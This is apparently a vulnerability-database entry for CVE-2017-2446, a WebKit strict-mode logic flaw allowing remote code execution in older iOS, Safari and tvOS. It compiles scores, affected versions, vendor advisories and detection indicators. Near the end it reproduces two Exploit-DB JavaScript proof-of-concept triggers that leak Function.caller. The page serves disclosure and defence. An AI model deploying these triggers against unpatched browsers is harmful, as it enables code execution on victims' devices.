CVE-2017-2446
Published 2017-04-02

CVE-2017-2446: An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue…
Priority: P2 · 65 · high · 8.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Exploit: public exploit indexed
EPSS: 8.19% (94.2th percentile)
An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code via a crafted web site that leverages the mishandling of strict mode functions.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | ios | — | — |
| apple | iphone_os | <= 10.2.1 | — |
| apple | safari | <= 10.0.3 | — |
| apple | safari | — | — |
| apple | tvos | <= 10.1.1 | — |
| apple | tvos | — | — |
| debian | webkit2gtk | < webkit2gtk 2.14.6-1 (bookworm) | webkit2gtk 2.14.6-1 (bookworm) |
Detection & IOCs (extracted from sources)
- Exploit abuses Intl.DateTimeFormat.format() with a crafted object whose valueOf property is a function that leaks f.caller — look for JavaScript using 'new Intl.DateTimeFormat()' combined with a custom valueOf function passed to .format()
- Exploit variant abuses an Array.prototype property getter to leak g.caller in strict mode — look for Object.defineProperty on Array.prototype numeric indices combined with .concat() calls
- Both PoC exploits call the leaked caller reference with a numeric magic value (0x77777777 or 0x7777) as the first argument — this pattern in JS heap/memory may indicate exploitation attempts
- The vulnerability is triggered by processing maliciously crafted web content in WebKit — monitor for Safari/WebKit processes spawning unexpected child processes as a post-exploitation indicator
- Root cause is a logic issue in the handling of strict mode functions (Function.caller access bypass) — detection should focus on JavaScript that accesses .caller or .arguments on strict-mode functions via builtins or prototype getters
- Affected platforms are iOS before 10.3, Safari before 10.1, and tvOS before 10.2 — exploitation is only possible on unpatched versions of these Apple products
- On Debian-based Linux systems (webkit2gtk), the vulnerability is resolved in version 2.14.6-1 across all tracked branches — ensure this version or later is deployed
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.0 | 8.8 | HIGH | CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 6.8 | MEDIUM | AV:N/AC:M/Au:N/C:P/I:P/A:P |
| osv | — | 8.8 | HIGH | — |
| vendor_debian | — | 8.8 | LOW | — |
Ubuntu
WebKitGTK+ vulnerabilities
vendor_ubuntu·2017-04-10
CVE-2016-9642 WebKitGTK+ vulnerabilities
Title: WebKitGTK+ vulnerabilities
Summary: Several security issues were fixed in WebKitGTK+.
A large number of security issues were discovered in the WebKitGTK+ Web and JavaScript engines. If a user were tricked into viewing a malicious website, a remote attacker could exploit a variety of issues related to web browser security, including cross-site scripting attacks, denial of service attacks, and arbitrary code execution.
Instructions: This update uses a new upstream release, which includes additional bug fixes. After a standard system update you need to restart any applications that use WebKitGTK+, such as Epiphany, to make all the necessary changes.
Apple
CVE-2017-2446: tvOS 10.2
vendor_apple·2017-03-27·CVSS 8.8
CVE-2017-2446 [HIGH] CVE-2017-2446: tvOS 10.2
Apple Security Update: About the security content of tvOS 10.2
Product: tvOS
Version: 10.2
CVE: CVE-2017-2446
Component: WebKit
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.
Apple
CVE-2017-2446: iOS 10.3
vendor_apple·2017-03-27·CVSS 8.8
CVE-2017-2446 [HIGH] CVE-2017-2446: iOS 10.3
Apple Security Update: About the security content of iOS 10.3
Product: iOS
Version: 10.3
CVE: CVE-2017-2446
Component: WebKit
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.
Apple
CVE-2017-2446: Safari 10.1
vendor_apple·2017-03-27·CVSS 8.8
CVE-2017-2446 [HIGH] CVE-2017-2446: Safari 10.1
Apple Security Update: About the security content of Safari 10.1
Product: Safari
Version: 10.1
CVE: CVE-2017-2446
Component: WebKit
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.
Debian
CVE-2017-2446: webkit2gtk - An issue was discovered in certain Apple products. iOS before 10.3 is affected. ...
vendor_debian·2017·CVSS 8.8
CVE-2017-2446 [HIGH] CVE-2017-2446: webkit2gtk - An issue was discovered in certain Apple products. iOS before 10.3 is affected. ...
An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code via a crafted web site that leverages the mishandling of strict mode functions.
Scope: local
bookworm: resolved (fixed in 2.14.6-1)
bullseye: resolved (fixed in 2.14.6-1)
forky: resolved (fixed in 2.14.6-1)
sid: resolved (fixed in 2.14.6-1)
trixie: resolved (fixed in 2.14.6-1)
GHSA
GHSA-3f9w-9gh8-8jm4: An issue was discovered in certain Apple products
ghsa_unreviewed·2022-05-13
CVE-2017-2446 [HIGH] GHSA-3f9w-9gh8-8jm4: An issue was discovered in certain Apple products
An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code via a crafted web site that leverages the mishandling of strict mode functions.
OSV
CVE-2017-2446: An issue was discovered in certain Apple products
osv·2017-04-02·CVSS 8.8
CVE-2017-2446 [HIGH] CVE-2017-2446: An issue was discovered in certain Apple products
An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code via a crafted web site that leverages the mishandling of strict mode functions.
No detection rules found.
Exploit-DB
Apple Safari - 'DateTimeFormat.format' Type Confusion
exploitdb·2017-03-27
CVE-2017-2446 Apple Safari - 'DateTimeFormat.format' Type Confusion
Apple Safari - 'DateTimeFormat.format' Type Confusion
---
```javascript
// PoC as indexed on Exploit-DB: a valueOf callback invoked by
// Intl.DateTimeFormat.format() reads f.caller, which strict-mode
// rules should have prevented.
var date = new Date(Date.UTC(2012, 11, 20, 3, 0, 0));
var i = new Intl.DateTimeFormat();
//print(i);
var q;
function f(){
//print("in f");
//print(f.caller);
q = f.caller;
return 10;
}
try{
i.format({valueOf : f});
}catch(e){
//print("problem");
}
//print(q);
q.call(0x77777777);
```
Exploit-DB
Apple Safari - Builtin JavaScript Allows Function.caller to be Used in Strict Mode
exploitdb·2017-03-27
CVE-2017-2446 Apple Safari - Builtin JavaScript Allows Function.caller to be Used in Strict Mode
Apple Safari - Builtin JavaScript Allows Function.caller to be Used in Strict Mode
---
```javascript
// PoC as indexed on Exploit-DB: a getter installed on Array.prototype
// is triggered by the builtin concat() and reads g.caller.
var q;
function g(){
//print("in g");
//print(arguments.caller);
//print(g.caller);
q = g.caller;
//print(g.caller);
return 7;
}
var a = [1, 2, 3];
Object.defineProperty( Array.prototype, "1", { get : g} );
var a = [1, 2, 3];
a.length = 4;
Object.defineProperty(Array.prototype, "3", {get : g});
[4, 5, 6].concat(a);
alert(q);
q(0x7777, 0x7777, 0);
```
No writeups or analysis indexed.
References
- http://www.securityfocus.com/bid/97130
- http://www.securitytracker.com/id/1038137
- https://bugs.chromium.org/p/project-zero/issues/detail?id=1032
- https://doar-e.github.io/blog/2018/07/14/cve-2017-2446-or-jscjsglobalobjectishavingabadtime/
- https://security.gentoo.org/glsa/201706-15
- https://support.apple.com/HT207600
- https://support.apple.com/HT207601
- https://support.apple.com/HT207617
- https://www.exploit-db.com/exploits/41741/
- https://www.exploit-db.com/exploits/41742/